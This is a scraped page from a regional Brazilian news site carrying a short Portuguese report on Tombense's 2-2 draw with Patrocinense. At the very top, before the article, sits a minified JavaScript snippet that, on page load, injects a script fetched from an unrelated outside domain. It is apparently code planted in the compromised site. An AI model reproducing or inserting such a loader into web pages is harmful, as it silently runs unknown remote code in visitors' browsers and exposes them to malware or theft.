;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Tombense empata com Patrocinenseem 2 x 2 no Almeidão. - Portal Carangola

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Tombense empata com Patrocinenseem 2 x 2 no Almeidão.

No primeiro tempo Tombense fez 2 x 0, ,mais na segunda etapa em quatro minutos o Patrocinense arrancou o empate. Aproveitou a volta do 2º tempo e após o apagão de 22 minutos e buscou o empate. Os gols do Tombense foram marcados por Rubens e Keké e os do Patrocinense  por Fernando e Mateus. O Resultado não foi bom para os dois times principalmente para o Tombense que caiu para o 7º lugar. O Tombense aguarda agora o Vasco em casa pela Copa do Brasil no dia 14 de abril.